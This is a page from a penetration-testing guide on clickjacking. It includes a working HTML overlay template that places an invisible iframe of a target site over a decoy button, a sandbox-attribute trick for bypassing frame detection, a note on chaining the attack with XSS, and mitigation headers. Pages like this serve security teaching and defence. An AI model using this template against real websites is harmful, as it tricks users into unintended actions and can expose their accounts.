d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • Basic clickjacking attack
  • Bypass frame detection
  • Combining with XSS
  • Mitigation
Edit on GitHub
  1. Exploitation
  2. Web

Clickjacking

PreviousHost header attacksNextLogic flaws

Last updated 3 years ago

Clickjacking is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages.

--

Basic clickjacking attack

Just cover the target site by an overlay, like in follows. Or use Burp Suite's Clickbandit (Burp -> Burp Clickbandit). To prefill form data, just try appending params via url (GET).

<head>
	<style>
		#targetWebsite {
			position: relative;
			width: 800px;
			height: 600px;
			opacity: 0.00001;
			z-index: 2;
		}

		#decoyWebsite {
			position: absolute;
			top: 450px;
			left: 50px;
			width: 100px;
			height: 20px;
			z-index: 1;
		}
	</style>
</head>
<body>
	<div id="decoyWebsite">
	Click me
	</div>
	<iframe id="targetWebsite" src="https://website.com?param=value">
	</iframe>
</body>

Bypass frame detection

A common protection to avoid clickjacking is to try to detect, when a website is being framed. This can potentially be bypassed by using HTML5's sandbox iframe attribute, by specifing allow-forms, but omittin allow-scripts and allow-top-navigation.

...
<iframe sandbox="allow-forms" id="targetWebsite" src="https://website.com?param=value">
...

Combining with XSS

Sometimes you may be able to combine the attack with XSS, by e.g. providing an XSS exploit via prefilled form data.

Mitigation

  • Setting X-Frame-Options header to deny, sameorigin or allow-from <website>.

  • Using Content-Security-Policy: <policy> header, where <policy> should contain frame-ancestors being set to none, self or frame-ancestors <website>.

Wikipedia
PortSwigger - Web Security Academy - Clickjacking (UI redressing)